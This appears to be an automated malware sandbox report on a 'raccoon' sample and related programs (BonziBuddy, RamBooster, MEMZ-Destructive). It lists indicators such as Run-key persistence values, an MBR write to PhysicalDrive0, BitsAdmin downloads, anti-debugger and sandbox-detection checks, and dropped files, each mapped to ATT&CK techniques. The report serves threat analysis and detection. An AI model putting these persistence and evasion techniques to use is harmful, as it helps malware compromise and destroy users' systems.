raccoon | 44b4fd6220da480f67d6f417387f255e0e6d78e4a6b0eedf062164953c70f039

Modify Registry

T1112

Processes:

tv_enua.exeMSAGENT.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	tv_enua.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	MSAGENT.EXE

Executes dropped EXE 14 IoCs

Processes:

7z2201-x64.exe7zG.exe7zG.exeSatup.exeSatup.exe7zG.exe7zG.exezsdfvrtuipojmnfgd.exemsedge.exeRambooster.exeFreeRAM XP Pro.exeMSAGENT.EXEtv_enua.exeAgentSvr.exe

pid	process
5984	7z2201-x64.exe
404	7zG.exe
2464	7zG.exe
4776	Satup.exe
5968	Satup.exe
2108	7zG.exe
3272	7zG.exe
6116	zsdfvrtuipojmnfgd.exe
5448	msedge.exe
5432	Rambooster.exe
6304	FreeRAM XP Pro.exe
996	MSAGENT.EXE
6752	tv_enua.exe
6772	AgentSvr.exe

Loads dropped DLL 30 IoCs

Processes:

7zG.exe7zG.exe7zG.exe7zG.exemsedge.exeBonziBuddy432.exetv_enua.exeregsvr32.exeregsvr32.exeMSAGENT.EXEregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exe

pid	process
3192
3192
404	7zG.exe
2464	7zG.exe
2108	7zG.exe
3272	7zG.exe
5448	msedge.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
3448	BonziBuddy432.exe
6752	tv_enua.exe
1916	regsvr32.exe
1916	regsvr32.exe
5484	regsvr32.exe
996	MSAGENT.EXE
4396	regsvr32.exe
1444	regsvr32.exe
3976	regsvr32.exe
4824	regsvr32.exe
4092	regsvr32.exe
7116	regsvr32.exe
5204	regsvr32.exe

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Processes:

7z2201-x64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2201-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2201-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2201-x64.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\RamBooster20.exe	upx
C:\Users\Admin\Downloads\RamBooster20.exe	upx
C:\Users\Admin\Downloads\RamBooster20.exe	upx
behavioral1/memory/5448-13432-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/5448-13701-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/5448-13733-0x0000000000400000-0x000000000042A000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

Processes:

FreeRAM XP Pro.exetv_enua.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	FreeRAM XP Pro.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FreeRAM XP = "\"C:\\Program Files (x86)\\YourWare Solutions\\FreeRAM XP Pro\\FreeRAM XP Pro.exe\" -win"	FreeRAM XP Pro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	tv_enua.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	tv_enua.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2981 ipinfo.io
2980 ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

MEMZ-Destructive.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MEMZ-Destructive.exe

flow	ioc
2981	ipinfo.io
2980	ipinfo.io

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MEMZ-Destructive.exe

Drops file in System32 directory 3 IoCs

Processes:

tv_enua.exe

description	ioc	process
File created	C:\Windows\SysWOW64\SET9408.tmp	tv_enua.exe
File opened for modification	C:\Windows\SysWOW64\msvcp50.dll	tv_enua.exe
File opened for modification	C:\Windows\SysWOW64\SET9408.tmp	tv_enua.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

Satup.exeSatup.exezsdfvrtuipojmnfgd.exe

pid process

4776 Satup.exe
4776 Satup.exe
5968 Satup.exe
5968 Satup.exe
6116 zsdfvrtuipojmnfgd.exe
6116 zsdfvrtuipojmnfgd.exe

Drops file in Program Files directory 64 IoCs

Processes:

BonziBuddy432.exe7z2201-x64.exemsedge.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.htm	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page11.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t3.nbd-SR	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t3.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb006.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page5.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2201-x64.exe
File created	C:\Program Files (x86)\RamBooster 2.0\setup.clg	msedge.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\speedup.ico	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page9.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page9.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp007.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	7z2201-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\j2.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\p001.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb011.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page8.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page0.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\RamBooster 2.0\Rambooster.exe.ini	msedge.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Apps.nbd	BonziBuddy432.exe
File created	C:\Program Files (x86)\RamBooster 2.0\Rambooster.cnt	msedge.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2201-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb015.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page6.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp003.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BBReader.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BG\Bg1.bmp	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2201-x64.exe
File created	C:\Program Files (x86)\RamBooster 2.0\Rambooster.exe	msedge.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\spchcpl.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page3.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2201-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page12.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page16.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page6.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2201-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page10.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page15.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Uninstall.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2201-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page14.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page2.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\book	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp005.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page5.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\SSubTmr6.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\chose.bat	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page1.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	7z2201-x64.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Snd2.wav	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page14.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\spchapi.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb007.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2201-x64.exe

Drops file in Windows directory 56 IoCs

Processes:

MSAGENT.EXEtv_enua.exeBonziBuddy432.exe

description	ioc	process
File created	C:\Windows\msagent\SET98AC.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\tv_enua.inf	tv_enua.exe
File created	C:\Windows\msagent\SET9897.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET98AB.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET98AE.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\mslwvtts.dll	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\SET93F6.tmp	tv_enua.exe
File created	C:\Windows\msagent\SET9899.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentMPx.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET9899.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentDp2.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98AE.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET98D2.tmp	MSAGENT.EXE
File created	C:\Windows\fonts\SET93F7.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SET9898.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentDPv.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentAnm.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSvr.exe	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\SET93F4.tmp	tv_enua.exe
File opened for modification	C:\Windows\fonts\andmoipa.ttf	tv_enua.exe
File created	C:\Windows\msagent\SET98BF.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98AC.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98AD.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSR.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	MSAGENT.EXE
File created	C:\Windows\lhsp\tv\SET93F4.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\tv\tv_enua.dll	tv_enua.exe
File created	C:\Windows\msagent\SET98AD.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98D2.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\tv_enua.hlp	tv_enua.exe
File created	C:\Windows\msagent\SET9898.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET989A.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\SET93F5.tmp	tv_enua.exe
File opened for modification	C:\Windows\INF\SET98BE.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98BF.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET989A.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\SET98C1.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET98AB.tmp	MSAGENT.EXE
File created	C:\Windows\help\SET98C0.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\Agt0409.hlp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgtCtl15.tlb	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\chars\Peedy.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\fonts\SET93F7.tmp	tv_enua.exe
File created	C:\Windows\INF\SET9407.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentPsh.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\chars\Bonzi.acs	BonziBuddy432.exe
File created	C:\Windows\lhsp\help\SET93F6.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentCtl.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET9897.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\SET98C0.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\intl\SET98C1.tmp	MSAGENT.EXE
File created	C:\Windows\lhsp\tv\SET93F5.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	tv_enua.exe
File opened for modification	C:\Windows\INF\SET9407.tmp	tv_enua.exe
File created	C:\Windows\INF\SET98BE.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\agtinst.inf	MSAGENT.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Download via BitsAdmin 1 TTPs 10 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid	process
5064	bitsadmin.exe
4364	bitsadmin.exe
7980	bitsadmin.exe
4348	bitsadmin.exe
4948	bitsadmin.exe
4864	bitsadmin.exe
5828	bitsadmin.exe
7132	bitsadmin.exe
2628	bitsadmin.exe
8132	bitsadmin.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

Processes:

BonziBuddy432.exeregsvr32.exeAgentSvr.exeregsvr32.exeregsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D42-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00E212A0-E66D-11CD-836C-0000C0C14E92}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E91E27A1-C5AE-11D2-8D1B-00104B9E072A}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BE8-7DE6-11D0-91FE-00C04FD701A5}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DE8EF600-2F82-11D1-ACAC-00C04FD97575}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.SBarCtrl.2\ = "Microsoft StatusBar Control, version 6.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FD8-1BF9-11D2-BAE8-00104B9E0792}\ToolboxBitmap32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FDC-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{24830770-5D94-11CE-9412-0000C0C14E92}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{643F1352-1D07-11CE-9E52-0000C0554C0A}\TypeLib\Version = "1.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\ = "IComboItems"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FDD-1BF9-11D2-BAE8-00104B9E0792}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\Implemented Categories\{40FC6ED9-2438-11CF-A3DB-080036F12502}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BDF-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FD8-1BF9-11D2-BAE8-00104B9E0792}\MiscStatus	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E8671A88-E5DD-11CD-836C-0000C0C14E92}\Version\ = "1.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{643F1350-1D07-11CE-9E52-0000C0554C0A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D4E-2CDD-11D3-9DD0-D3CD4078982A}\ = "_ISkinScrollBarEvents"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{916694A9-8AD6-11D2-B6FD-0060976C699F}\ProxyStubClsid	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F5BE8BC2-7DE6-11D0-91FE-00C04FD701A5}\2.0\0\win32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BDB-7DE6-11D0-91FE-00C04FD701A5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FDF-1BF9-11D2-BAE8-00104B9E0792}\Programmable	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BDB-7DE6-11D0-91FE-00C04FD701A5}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D46-2CDD-11D3-9DD0-D3CD4078982A}\ = "ISkinPanel"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B1BE807-567F-11D1-B652-0060976C699F}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C01-3910-11D1-ACB3-00C04FD97575}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D6589121-FC70-11D0-AC94-00C04FD97575}\ProxyStubClsid32	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{972DE6C2-8B09-11D2-B652-A1FD6CC34260}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F59C2A4-4C01-4451-BE5B-09787B123A5E}\InprocServer32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FD8-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B976287-3692-11D0-9B8A-0000C0F04C96}\TypeLib\Version = "3.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5AA1F9B0-F64C-11CD-95A8-0000C04D4C0A}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{24830770-5D94-11CE-9412-0000C0C14E92}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BD4-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F5BE8BC2-7DE6-11D0-91FE-00C04FD701A5}\1.5\HELPDIR	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D46-2CDD-11D3-9DD0-D3CD4078982A}\ = "ISkinPanel"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1533A365-F76F-4518-8A56-4CD34547F8AB}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\BonziBuddy432\\MSCOMCTL.OCX, 10"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}\3.0\0\win32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE2-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\Version = "3.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
